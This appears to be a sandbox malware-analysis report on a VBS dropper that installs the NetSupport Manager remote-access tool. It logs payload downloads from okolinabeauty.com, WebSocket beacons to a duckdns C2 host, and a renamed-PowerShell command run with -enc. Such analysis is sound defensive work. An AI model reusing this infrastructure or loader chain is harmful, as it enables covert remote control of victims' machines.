                                                                                        Sec-WebSocket-Accept: 9LFZfxhTGKXCHZyR+7EsFd0IGWo=


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 5 | 192.168.11.20 | 49751 | 185.170.144.66 | 1773 | 3456 | C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe |

Timestamp: Nov 23, 2024 02:55:21.892942905 CET | Bytes transferred: 203 | Direction: OUT | Data:
GET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: m9kJK3waO5m0WUa27vHefw==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
Timestamp: Nov 23, 2024 02:55:22.108736038 CET | Bytes transferred: 129 | Direction: IN | Data:
HTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: b0GES8mmvOgVXztMXbAGYL2TuJY=


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 6 | 192.168.11.20 | 49752 | 185.170.144.66 | 1773 | 3456 | C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe |

Timestamp: Nov 23, 2024 02:55:22.994482040 CET | Bytes transferred: 203 | Direction: OUT | Data:
GET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: C/hxaKHuYS2UrlHQxKR4gw==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
Timestamp: Nov 23, 2024 02:55:23.203349113 CET | Bytes transferred: 129 | Direction: IN | Data:
HTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: SBWPnimIbw9Euch0iEWqzZW5FAs=


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 7 | 192.168.11.20 | 49753 | 185.170.144.66 | 1773 | 3456 | C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe |

Timestamp: Nov 23, 2024 02:55:24.155714035 CET | Bytes transferred: 203 | Direction: OUT | Data:
GET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: caubgnS+MZny0vR9bbg5RA==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:24.365861893 CET | 129 | IN | HTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: yEFQqbbjwWlxkFtEuMwjc3RgnAU=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        8 | 192.168.11.20 | 49754 | 185.170.144.66 | 1773 | 3456 | C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 23, 2024 02:55:25.326414108 CET | 203 | OUT | GET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: +CDSFNozeAu5QKVlY2hWAg==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:25.541098118 CET | 129 | IN | HTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: 0os0xeaK06ZIjbcvvJKCpgUtDMA=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        9 | 192.168.11.20 | 49755 | 185.170.144.66 | 1773 | 3456 | C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 23, 2024 02:55:26.468266010 CET | 203 | OUT | GET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: OfCHRkExSmfSkhIE1dUXPg==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:26.678272009 CET | 129 | IN | HTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: kUKgnlDk6cMydOvehd6RfNS+0yo=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        10 | 192.168.11.20 | 49756 | 185.170.144.66 | 1773 | 3456 | C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 23, 2024 02:55:27.683854103 CET | 203 | OUT | GET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: PfOAU8IQZJ/Yqwf/t/iX7A==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:27.895344973 CET | 129 | IN | HTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: 7kfn/2tOKnqSvWIDIjwAbMmtGGI=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        11 | 192.168.11.20 | 49757 | 185.170.144.66 | 1773 | 3456 | C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 23, 2024 02:55:28.899326086 CET | 203 | OUT | GET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: sMjNo1lKJO+LEGT7L1NgIg==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:29.108091116 CET | 129 | IN | HTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: apWKOsl8jBa+n9yWEdG3GE+8uOE=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        12 | 192.168.11.20 | 49758 | 185.170.144.66 | 1773 | 3456 | C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 23, 2024 02:55:30.174870968 CET | 203 | OUT | GET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: QT+MbphHbppMnfmijWU4Nw==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:30.385309935 CET | 129 | IN | HTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: TsxMTTyzTCHPEHl3ftumdZYj7+8=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        13 | 192.168.11.20 | 49759 | 185.170.144.66 | 1773 | 3456 | C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 23, 2024 02:55:31.405843973 CET | 203 | OUT | GET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: iAsO0TcHuUy74Pc0cvo9HA==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:31.619908094 CET | 129 | IN | HTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: 3aYM8x6PMiPPPg7xYT4DnsLgFk0=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        14 | 192.168.11.20 | 49760 | 185.170.144.66 | 1773 | 3456 | C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 23, 2024 02:55:32.527177095 CET | 203 | OUT | GET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: t3jhEwhGRFSK21cuDwXKUw==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:32.741940975 CET | 129 | IN | HTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: onO9klWqcFT3qMdlAIJbTO3/ZX8=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        15 | 192.168.11.20 | 49761 | 185.170.144.66 | 1773 | 3456 | C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 23, 2024 02:55:33.715447903 CET | 203 | OUT | GET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: nh1sF2oxMIjiKKn9/K1PEg==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:33.925350904 CET | 129 | IN | HTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: wyG1IARf4ogR3PWjxLjBes1rsSw=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        16 | 192.168.11.20 | 49762 | 185.170.144.66 | 1773 | 3456 | C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 23, 2024 02:55:34.877552032 CET | 203 | OUT | GET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: 5lgUaUu7TuCWROAY5ZCpFQ==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:35.087372065 CET | 129 | IN | HTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: VVYLA7hA9Escs6hM79xTEfiu+XI=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        17 | 192.168.11.20 | 49763 | 185.170.144.66 | 1773 | 3456 | C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 23, 2024 02:55:35.978373051 CET | 203 | OUT | GET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: blIshCnQwM5gx0hXZZVItg==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:36.188447952 CET | 129 | IN | HTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: 6vhvcCojjTJSa+lNBOPy9nVCilI=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        18 | 192.168.11.20 | 49764 | 185.170.144.66 | 1773 | 3456 | C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 23, 2024 02:55:37.064203024 CET | 203 | OUT | GET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: J+H1KaKb9G3hAhTlcn7hzQ==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:37.273241997 CET | 129 | IN | HTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: lDd8JGle80KgGdMhC6dUGm70s8A=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        19 | 192.168.11.20 | 49765 | 185.170.144.66 | 1773 | 3456 | C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 23, 2024 02:55:38.318128109 CET | 203 | OUT | GET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: Nn8Rhd+1HFurNpMaG8R20g==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:38.525882959 CET | 129 | IN | HTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: cuv5yGpukidHX4EV9lPNDZkr6h4=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        20 | 192.168.11.20 | 49766 | 185.170.144.66 | 1773
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 23, 2024 02:55:39.432845116 CET | 203 | OUT | GET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: qih66MhM77p0E5xPbe9BTg==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:39.642514944 CET | 129 | IN | HTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: i6G1niayAqnS8/GhBl7QdhvqCXw=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        21 | 192.168.11.20 | 49767 | 185.170.144.66 | 1773
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 23, 2024 02:55:40.546019077 CET | 203 | OUT | GET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: +EYqtX5iKFS1ntG4M95OBg==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:40.757194996 CET | 129 | IN | HTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: VYGowUX2wMw9wZcu8e/mqbyoN8k=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        22 | 192.168.11.20 | 49768 | 185.170.144.66 | 1773
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 23, 2024 02:55:41.723135948 CET | 203 | OUT | GET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: D4v6s99lRBPXYCfc8h/2uw==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:41.933751106 CET | 129 | IN | HTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: hyuLhbgiBL2Fbuf4DAHjD+PQnco=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        23 | 192.168.11.20 | 49769 | 185.170.144.66 | 1773
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 23, 2024 02:55:42.849035025 CET | 203 | OUT | GET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: lCV+TupX3ptsyHMqBQa7VQ==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:43.059475899 CET | 129 | IN | HTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: t/rFRPn4/Z36JS4yFXLvCXii1Lk=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        24 | 192.168.11.20 | 49770 | 185.170.144.66 | 1773
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 23, 2024 02:55:44.056868076 CET | 203 | OUT | GET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: wFD9YmzoAR4jGxbs8QMbCQ==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:44.268524885 CET | 129 | IN | HTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: wxo9Cb7p9/iFsmFzvf2v1nx9vvQ=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        0 | 192.168.11.20 | 49742 | 176.126.113.166 | 443 | 2216 | C:\Windows\SysWOW64\wscript.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-11-23 01:53:40 UTC | 334 | OUT | GET /choh/NSM.lic HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en-GB;q=0.7,en;q=0.3
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                        Host: okolinabeauty.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-11-23 01:53:40 UTC | 240 | IN | HTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Sat, 23 Nov 2024 01:53:40 GMT
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Length: 253
                                                                                        Last-Modified: Tue, 12 Nov 2024 14:38:33 GMT
                                                                                        Connection: close
                                                                                        ETag: "67336869-fd"
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-23 01:53:40 UTC | 253 | IN | Data Ascii:
                                                                                        1400
                                                                                        0x98f177db
                                                                                        ; NetSupport License File.
                                                                                        ; Generated on 02:59 - 15/09/2022
                                                                                        [[Enforce]]
                                                                                        [_License]
                                                                                        control_only=0
                                                                                        expiry=
                                                                                        inactive=0
                                                                                        licensee=NSM1234
                                                                                        maxslaves=9999
                                                                                        os2=1
                                                                                        product=10
                                                                                        serial_no=NSM1234
                                                                                        shrink_wrap=0
                                                                                        transport=0


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        1 | 192.168.11.20 | 49743 | 176.126.113.166 | 443 | 2216 | C:\Windows\SysWOW64\wscript.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-11-23 01:53:40 UTC | 339 | OUT | GET /choh/Client32.ini HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en-GB;q=0.7,en;q=0.3
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                        Host: okolinabeauty.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-11-23 01:53:41 UTC | 241 | IN | HTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Sat, 23 Nov 2024 01:53:40 GMT
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Length: 837
                                                                                        Last-Modified: Tue, 12 Nov 2024 14:38:33 GMT
                                                                                        Connection: close
                                                                                        ETag: "67336869-345"
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-23 01:53:41 UTC | 837 | IN | Data Ascii:
                                                                                        0xa7cd73d8
                                                                                        [Client]
                                                                                        _present=1
                                                                                        DisableChat=1
                                                                                        DisableChatMenu=1
                                                                                        DisableClientConnect=1
                                                                                        DisableCloseApps=0
                                                                                        DisableDisconnect=1
                                                                                        DisableLocalInventory=1
                                                                                        DisableManageServices=0
                                                                                        DisableMessage=1
                                                                                        DisableReplayMenu=1
                                                                                        DisableRequestHelp=1
                                                                                        IgnoreBro


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        2 | 192.168.11.20 | 49744 | 176.126.113.166 | 443 | 2216 | C:\Windows\SysWOW64\wscript.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-11-23 01:53:41 UTC | 335 | OUT | GET /choh/vrep.msi HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en-GB;q=0.7,en;q=0.3
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                        Host: okolinabeauty.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-11-23 01:53:41 UTC | 250 | IN | HTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Sat, 23 Nov 2024 01:53:41 GMT
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Length: 41645568
                                                                                        Last-Modified: Tue, 12 Nov 2024 14:38:35 GMT
                                                                                        Connection: close
                                                                                        ETag: "6733686b-27b7600"
                                                                                        Accept-Ranges: bytes



                                                                                        Target ID:0
                                                                                        Start time:20:53:32
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs"
                                                                                        Imagebase:0x7ff7b6630000
                                                                                        File size:170'496 bytes
                                                                                        MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:2
                                                                                        Start time:20:53:34
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Pyyidau.vbs.exe" /Y
                                                                                        Imagebase:0x7ff71cca0000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:20:53:34
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7c7080000
                                                                                        File size:875'008 bytes
                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:4
                                                                                        Start time:20:53:36
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Users\user\Desktop\Pyyidau.vbs.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc 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
                                                                                        Imagebase:0xc50000
                                                                                        File size:433'152 bytes
                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.113950407001.00000000051F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.114071601161.000000000FC00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 0%, ReversingLabs
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:5
                                                                                        Start time:20:53:36
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7c7080000
                                                                                        File size:875'008 bytes
                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:6
                                                                                        Start time:20:53:37
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs"
                                                                                        Imagebase:0xf80000
                                                                                        File size:147'456 bytes
                                                                                        MD5 hash:4D780D8F77047EE1C65F747D9F63A1FE
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Author: Joe Security
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:7
                                                                                        Start time:20:53:37
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                        Imagebase:0x950000
                                                                                        File size:65'440 bytes
                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:8
                                                                                        Start time:20:53:38
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                        Imagebase:0x1a0000
                                                                                        File size:65'440 bytes
                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:9
                                                                                        Start time:20:53:38
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                        Imagebase:0xb0000
                                                                                        File size:65'440 bytes
                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:10
                                                                                        Start time:20:53:38
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
